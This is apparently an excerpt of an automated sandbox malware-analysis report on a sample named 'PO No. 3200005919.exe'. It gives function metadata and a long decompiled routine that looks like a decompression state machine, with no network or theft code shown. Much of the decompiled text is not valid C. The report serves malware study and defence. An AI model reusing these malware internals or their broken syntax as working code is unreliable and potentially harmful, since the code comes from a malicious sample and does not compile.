                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\PO No. 3200005919.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-4249152825
                                                                      • Opcode ID: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                      • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                                      • Opcode Fuzzy Hash: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                                      • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E00406ABA() {
                                                                      				unsigned short _t531;
                                                                      				signed int _t532;
                                                                      				void _t533;
                                                                      				void* _t534;
                                                                      				signed int _t535;
                                                                      				signed int _t565;
                                                                      				signed int _t568;
                                                                      				signed int _t590;
                                                                      				signed int* _t607;
                                                                      				void* _t614;
                                                                      
                                                                      				L0:
                                                                      				while(1) {
                                                                      					L0:
                                                                      					if( *(_t614 - 0x40) != 0) {
                                                                      						 *(_t614 - 0x34) = 1;
                                                                      						 *(_t614 - 0x84) = 7;
                                                                      						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                      						L132:
                                                                      						 *(_t614 - 0x54) = _t607;
                                                                      						L133:
                                                                      						_t531 =  *_t607;
                                                                      						_t590 = _t531 & 0x0000ffff;
                                                                      						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                      						if( *(_t614 - 0xc) >= _t565) {
                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                      							 *(_t614 - 0x40) = 1;
                                                                      							_t532 = _t531 - (_t531 >> 5);
                                                                      							 *_t607 = _t532;
                                                                      						} else {
                                                                      							 *(_t614 - 0x10) = _t565;
                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                      							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                      						}
                                                                      						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                      							L139:
                                                                      							_t533 =  *(_t614 - 0x84);
                                                                      							L140:
                                                                      							 *(_t614 - 0x88) = _t533;
                                                                      							goto L1;
                                                                      						} else {
                                                                      							L137:
                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                      								 *(_t614 - 0x88) = 5;
                                                                      								goto L170;
                                                                      							}
                                                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                      							goto L139;
                                                                      						}
                                                                      					} else {
                                                                      						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                      						__esi =  *(__ebp - 0x60);
                                                                      						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                      						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                      						__ecx =  *(__ebp - 0x3c);
                                                                      						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                      						__ecx =  *(__ebp - 4);
                                                                      						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                      						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                      						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      						if( *(__ebp - 0x38) >= 4) {
                                                                      							if( *(__ebp - 0x38) >= 0xa) {
                                                                      								_t97 = __ebp - 0x38;
                                                                      								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                      							} else {
                                                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                      							}
                                                                      						} else {
                                                                      							 *(__ebp - 0x38) = 0;
                                                                      						}
                                                                      						if( *(__ebp - 0x34) == __edx) {
                                                                      							__ebx = 0;
                                                                      							__ebx = 1;
                                                                      							L60:
                                                                      							__eax =  *(__ebp - 0x58);
                                                                      							__edx = __ebx + __ebx;
                                                                      							__ecx =  *(__ebp - 0x10);
                                                                      							__esi = __edx + __eax;
                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      							__ax =  *__esi;
                                                                      							 *(__ebp - 0x54) = __esi;
                                                                      							__edi = __ax & 0x0000ffff;
                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      								__cx = __ax;
                                                                      								_t216 = __edx + 1; // 0x1
                                                                      								__ebx = _t216;
                                                                      								__cx = __ax >> 5;
                                                                      								 *__esi = __ax;
                                                                      							} else {
                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                      								0x800 = 0x800 - __edi;
                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      								__ebx = __ebx + __ebx;
                                                                      								 *__esi = __cx;
                                                                      							}
                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      								L59:
                                                                      								if(__ebx >= 0x100) {
                                                                      									goto L54;
                                                                      								}
                                                                      								goto L60;
                                                                      							} else {
                                                                      								L57:
                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                      									 *(__ebp - 0x88) = 0xf;
                                                                      									goto L170;
                                                                      								}
                                                                      								__ecx =  *(__ebp - 0x70);
                                                                      								__eax =  *(__ebp - 0xc);
                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      								_t202 = __ebp - 0x70;
                                                                      								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      								goto L59;
                                                                      							}
                                                                      						} else {
                                                                      							__eax =  *(__ebp - 0x14);
                                                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      							if(__eax >=  *(__ebp - 0x74)) {
                                                                      								__eax = __eax +  *(__ebp - 0x74);
                                                                      							}
                                                                      							__ecx =  *(__ebp - 8);
                                                                      							__ebx = 0;
                                                                      							__ebx = 1;
                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                      							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                      							L40:
                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                      							__ecx =  *(__ebp - 0x58);
                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                      							 *(__ebp - 0x48) = __eax;
                                                                      							__eax = __eax + 1;
                                                                      							__eax = __eax << 8;
                                                                      							__eax = __eax + __ebx;
                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      							__ax =  *__esi;
                                                                      							 *(__ebp - 0x54) = __esi;
                                                                      							__edx = __ax & 0x0000ffff;
                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      								__cx = __ax;
                                                                      								 *(__ebp - 0x40) = 1;
                                                                      								__cx = __ax >> 5;
                                                                      								__ebx = __ebx + __ebx + 1;
                                                                      								 *__esi = __ax;
                                                                      							} else {
                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                      								0x800 = 0x800 - __edx;
                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                      								__ebx = __ebx + __ebx;
                                                                      								 *__esi = __cx;
                                                                      							}
                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      								L38:
                                                                      								__eax =  *(__ebp - 0x40);
                                                                      								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                      									while(1) {
                                                                      										if(__ebx >= 0x100) {
                                                                      											break;
                                                                      										}
                                                                      										__eax =  *(__ebp - 0x58);
                                                                      										__edx = __ebx + __ebx;
                                                                      										__ecx =  *(__ebp - 0x10);
                                                                      										__esi = __edx + __eax;
                                                                      										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      										__ax =  *__esi;
                                                                      										 *(__ebp - 0x54) = __esi;
                                                                      										__edi = __ax & 0x0000ffff;
                                                                      										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      										if( *(__ebp - 0xc) >= __ecx) {
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      											__cx = __ax;
                                                                      											_t169 = __edx + 1; // 0x1
                                                                      											__ebx = _t169;
                                                                      											__cx = __ax >> 5;
                                                                      											 *__esi = __ax;
                                                                      										} else {
                                                                      											 *(__ebp - 0x10) = __ecx;
                                                                      											0x800 = 0x800 - __edi;
                                                                      											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      											__ebx = __ebx + __ebx;
                                                                      											 *__esi = __cx;
                                                                      										}
                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                      										if( *(__ebp - 0x10) < 0x1000000) {
                                                                      											L45:
                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                      												goto L170;
                                                                      											}
                                                                      											__ecx =  *(__ebp - 0x70);
                                                                      											__eax =  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      											_t155 = __ebp - 0x70;
                                                                      											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      										}
                                                                      									}
                                                                      									L53:
                                                                      									_t172 = __ebp - 0x34;
                                                                      									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                      									L54:
                                                                      									__al =  *(__ebp - 0x44);
                                                                      									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                      									L55:
                                                                      									if( *(__ebp - 0x64) == 0) {
                                                                      										 *(__ebp - 0x88) = 0x1a;
                                                                      										goto L170;
                                                                      									}
                                                                      									__ecx =  *(__ebp - 0x68);
                                                                      									__al =  *(__ebp - 0x5c);
                                                                      									__edx =  *(__ebp - 8);
                                                                      									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                      									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                      									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                      									 *( *(__ebp - 0x68)) = __al;
                                                                      									__ecx =  *(__ebp - 0x14);
                                                                      									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                      									__eax = __ecx + 1;
                                                                      									__edx = 0;
                                                                      									_t191 = __eax %  *(__ebp - 0x74);
                                                                      									__eax = __eax /  *(__ebp - 0x74);
                                                                      									__edx = _t191;
                                                                      									L79:
                                                                      									 *(__ebp - 0x14) = __edx;
                                                                      									L80:
                                                                      									 *(__ebp - 0x88) = 2;
                                                                      									goto L1;
                                                                      								}
                                                                      								if(__ebx >= 0x100) {
                                                                      									goto L53;
                                                                      								}
                                                                      								goto L40;
                                                                      							} else {
                                                                      								L36:
                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                      									 *(__ebp - 0x88) = 0xd;
                                                                      									L170:
                                                                      									_t568 = 0x22;
                                                                      									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                      									_t535 = 0;
                                                                      									L172:
                                                                      									return _t535;
                                                                      								}
                                                                      								__ecx =  *(__ebp - 0x70);
                                                                      								__eax =  *(__ebp - 0xc);
                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      								_t121 = __ebp - 0x70;
                                                                      								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      								goto L38;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					L1:
                                                                      					_t534 =  *(_t614 - 0x88);
                                                                      					if(_t534 > 0x1c) {
                                                                      						L171:
                                                                      						_t535 = _t534 | 0xffffffff;
                                                                      						goto L172;
                                                                      					}
                                                                      					switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
                                                                      						case 0:
                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                      								goto L170;
                                                                      							}
                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                      							_t534 =  *( *(_t614 - 0x70));
                                                                      							if(_t534 > 0xe1) {
                                                                      								goto L171;
                                                                      							}
                                                                      							_t538 = _t534 & 0x000000ff;
                                                                      							_push(0x2d);
                                                                      							asm("cdq");
                                                                      							_pop(_t570);
                                                                      							_push(9);
                                                                      							_pop(_t571);
                                                                      							_t610 = _t538 / _t570;
                                                                      							_t540 = _t538 % _t570 & 0x000000ff;
                                                                      							asm("cdq");
                                                                      							_t605 = _t540 % _t571 & 0x000000ff;
                                                                      							 *(_t614 - 0x3c) = _t605;
                                                                      							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                      							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                      							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                      							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                      								L10:
                                                                      								if(_t613 == 0) {
                                                                      									L12:
                                                                      									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                      									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                      									goto L15;
                                                                      								} else {
                                                                      									goto L11;
                                                                      								}
                                                                      								do {
                                                                      									L11:
                                                                      									_t613 = _t613 - 1;
                                                                      									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                      								} while (_t613 != 0);
                                                                      								goto L12;
                                                                      							}
                                                                      							if( *(_t614 - 4) != 0) {
                                                                      								GlobalFree( *(_t614 - 4));
                                                                      							}
                                                                      							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                      							 *(_t614 - 4) = _t534;
                                                                      							if(_t534 == 0) {
                                                                      								goto L171;
                                                                      							} else {
                                                                      								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                      								goto L10;
                                                                      							}
                                                                      						case 1:
                                                                      							L13:
                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                      								 *(_t614 - 0x88) = 1;
                                                                      								goto L170;
                                                                      							}
                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                      							_t45 = _t614 - 0x48;
                                                                      							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                      							__eflags =  *_t45;
                                                                      							L15:
                                                                      							if( *(_t614 - 0x48) < 4) {
                                                                      								goto L13;
                                                                      							}
                                                                      							_t546 =  *(_t614 - 0x40);
                                                                      							if(_t546 ==  *(_t614 - 0x74)) {
                                                                      								L20:
                                                                      								 *(_t614 - 0x48) = 5;
                                                                      								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                      								goto L23;
                                                                      							}
                                                                      							 *(_t614 - 0x74) = _t546;
                                                                      							if( *(_t614 - 8) != 0) {
                                                                      								GlobalFree( *(_t614 - 8));
                                                                      							}
                                                                      							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                      							 *(_t614 - 8) = _t534;
                                                                      							if(_t534 == 0) {
                                                                      								goto L171;
                                                                      							} else {
                                                                      								goto L20;
                                                                      							}
                                                                      						case 2:
                                                                      							L24:
                                                                      							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                      							 *(_t614 - 0x84) = 6;
                                                                      							 *(_t614 - 0x4c) = _t553;
                                                                      							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                      							goto L132;
                                                                      						case 3:
                                                                      							L21:
                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                      								 *(_t614 - 0x88) = 3;
                                                                      								goto L170;
                                                                      							}
                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                      							_t67 = _t614 - 0x70;
                                                                      							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                      							__eflags =  *_t67;
                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                      							L23:
                                                                      							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                      							if( *(_t614 - 0x48) != 0) {
                                                                      								goto L21;
                                                                      							}
                                                                      							goto L24;
                                                                      						case 4:
                                                                      							goto L133;
                                                                      						case 5:
                                                                      							goto L137;
                                                                      						case 6:
                                                                      							goto L0;
                                                                      						case 7:
                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                      								__eax =  *(__ebp - 0x24);
                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      								__eax =  *(__ebp - 0x28);
                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      								__eax =  *(__ebp - 0x2c);
                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      								__eax = 0;
                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      								__al = __al & 0x000000fd;
                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                      								__eax =  *(__ebp - 4);
                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                      								__eflags = __eax;
                                                                      								 *(__ebp - 0x58) = __eax;
                                                                      								goto L68;
                                                                      							}
                                                                      							__eax =  *(__ebp - 4);
                                                                      							__ecx =  *(__ebp - 0x38);
                                                                      							 *(__ebp - 0x84) = 8;
                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                      							goto L132;
                                                                      						case 8:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								__eax =  *(__ebp - 4);
                                                                      								__ecx =  *(__ebp - 0x38);
                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                      							} else {
                                                                      								__eax =  *(__ebp - 0x38);
                                                                      								__ecx =  *(__ebp - 4);
                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                      								 *(__ebp - 0x84) = 9;
                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                      							}
                                                                      							goto L132;
                                                                      						case 9:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								goto L89;
                                                                      							}
                                                                      							__eflags =  *(__ebp - 0x60);
                                                                      							if( *(__ebp - 0x60) == 0) {
                                                                      								goto L171;
                                                                      							}
                                                                      							__eax = 0;
                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                      							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                      							__eflags = _t258;
                                                                      							0 | _t258 = _t258 + _t258 + 9;
                                                                      							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                      							goto L75;
                                                                      						case 0xa:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								__eax =  *(__ebp - 4);
                                                                      								__ecx =  *(__ebp - 0x38);
                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                      								goto L132;
                                                                      							}
                                                                      							__eax =  *(__ebp - 0x28);
                                                                      							goto L88;
                                                                      						case 0xb:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								__ecx =  *(__ebp - 0x24);
                                                                      								__eax =  *(__ebp - 0x20);
                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      							} else {
                                                                      								__eax =  *(__ebp - 0x24);
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x28);
                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      							L88:
                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      							L89:
                                                                      							__eax =  *(__ebp - 4);
                                                                      							 *(__ebp - 0x80) = 0x15;
                                                                      							__eax =  *(__ebp - 4) + 0xa68;
                                                                      							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                      							goto L68;
                                                                      						case 0xc:
                                                                      							L99:
                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                      								goto L170;
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x70);
                                                                      							__eax =  *(__ebp - 0xc);
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							_t334 = __ebp - 0x70;
                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                      							__eflags =  *_t334;
                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							__eax =  *(__ebp - 0x2c);
                                                                      							goto L101;
                                                                      						case 0xd:
                                                                      							goto L36;
                                                                      						case 0xe:
                                                                      							goto L45;
                                                                      						case 0xf:
                                                                      							goto L57;
                                                                      						case 0x10:
                                                                      							L109:
                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                      								goto L170;
                                                                      							}
                                                                      							__ecx =  *(__ebp - 0x70);
                                                                      							__eax =  *(__ebp - 0xc);
                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							_t365 = __ebp - 0x70;
                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                      							__eflags =  *_t365;
                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      							goto L111;
                                                                      						case 0x11:
                                                                      							L68:
                                                                      							__esi =  *(__ebp - 0x58);
                                                                      							 *(__ebp - 0x84) = 0x12;
                                                                      							goto L132;
                                                                      						case 0x12:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								__eax =  *(__ebp - 0x58);
                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                      								goto L132;
                                                                      							}
                                                                      							__eax =  *(__ebp - 0x4c);
                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                      							__ecx =  *(__ebp - 0x58);
                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                      							__eflags = __eax;
                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                      							goto L130;
                                                                      						case 0x13:
                                                                      							__eflags =  *(__ebp - 0x40);
                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                      								_t469 = __ebp - 0x58;
                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                      								__eflags =  *_t469;
                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                      								 *(__ebp - 0x40) = 8;
                                                                      								L144:
                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                      								goto L145;
                                                                      							}
                                                                      							__eax =  *(__ebp - 0x4c);
                                                                      							__ecx =  *(__ebp - 0x58);
                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                      							 *(__ebp - 0x30) = 8;
                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                      							L130:
                                                                      							 *(__ebp - 0x58) = __eax;
                                                                      							 *(__ebp - 0x40) = 3;
                                                                      							goto L144;
                                                                      						case 0x14:
                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                      							__eax =  *(__ebp - 0x80);
                                                                      							goto L140;
                                                                      						case 0x15:
                                                                      							__eax = 0;
                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      							__al = __al & 0x000000fd;
                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                      							goto L120;
                                                                      						case 0x16:
                                                                      							__eax =  *(__ebp - 0x30);
                                                                      							__eflags = __eax - 4;
                                                                      							if(__eax >= 4) {
                                                                      								_push(3);
                                                                      								_pop(__eax);
                                                                      							}
                                                                      							__ecx =  *(__ebp - 4);
